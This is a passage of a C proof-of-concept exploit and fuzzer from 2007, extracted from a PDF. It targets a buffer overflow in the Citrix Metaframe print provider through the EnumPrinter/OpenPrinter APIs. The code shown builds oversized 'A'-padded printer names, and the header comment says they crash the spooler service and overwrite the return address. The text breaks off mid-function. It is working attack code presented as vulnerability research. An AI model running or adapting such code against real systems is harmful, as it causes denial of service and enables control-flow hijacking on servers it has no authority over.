Citrix Metaframe Presentation Server Print Provider Buffer Overflow PoC.pdf

1 /* 2 Proof of concept exploit for ZDI − Citrix Metaframe spooler service vulnerability 3 Microsoft Windows − EnumPrinter() & EnumPrinterW() Fuzzer v0.1 4 Author: Andres Tarasco Acuña − atarasco@514.es 5 url: http://www.514.es 6 7 This is an intial version of EnumPrinter() and OpenPrinter() fuzzer. I hope that 8 it will help to identify similar vulnerabilities. 9 Tested against win2k3 + Citrix presentation server. If the system is vulnerable 10 this application will kill spooler service (spoolsv.exe ) and ret will be overwritten 11 with 0x00410041 12 13 514 Tiger Team ownz u 14 15 */ 16 #include <stdio.h> 17 #include <windows.h> 18 #include <Winspool.h> 19 #pragma comment(lib,"Winspool.lib") 20 21 22 void usage(char *name) { 23 printf("Usage: %s −a (Ascii fuzzing for local printer providers)\n",name); 24 printf("Usage: %s −u (Unicode fuzzing for local printer providers)\n",name); 25 exit(0); 26 } 27 28 #define RECURSIVE 1 29 #define OPT_UNICODE 2 30 #define MAX_PRINTER_LEN 4096 31 32 #define _DBG_ 33 #undef _DBG_ 34 35 int CustomFuzzSize[]= {25,50,100,150,250,300,500,1000,1500, 2000}; 36 wchar_t dst[MAX_PRINTER_LEN]; 37 38 39 40 void Fuzzer( wchar_t *orig,int opt, int unicode) { 41 int i,j; 42 int len; 43 44 if (unicode) len=wcslen(orig); 45 else len=strlen((char *)orig); 46 memset((char *)dst,’\0’,sizeof(dst)); 47 memcpy((char *)dst,orig,len*(1+unicode)); 48 j=wcslen(orig); 49 for(i=0;i<CustomFuzzSize[opt];i++) { 50 if (unicode) dst[j+i]=’A’; 51 else ((char *)dst)[j+i]=(char)’A’; 52 } Page 1/4 Citrix Metaframe Presentation Server Print Provider Buffer Overflow PoC Andres Tarasco 01/26/2007 53 54 if (opt==0) { 55 if (unicode) 56 printf("Fuzzing: %S ( %i −%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)−1]); 57 else printf("Fuzzing: %s ( %i −%i)\n",dst,CustomFuzzSize[0],CustomFuzzSize[sizeof(CustomFuzzSize)/sizeof(int)−1]); 58 } 59 60 } 61 62 63 DWORD ShowPrinterInfo(wchar_t *lpName, int lev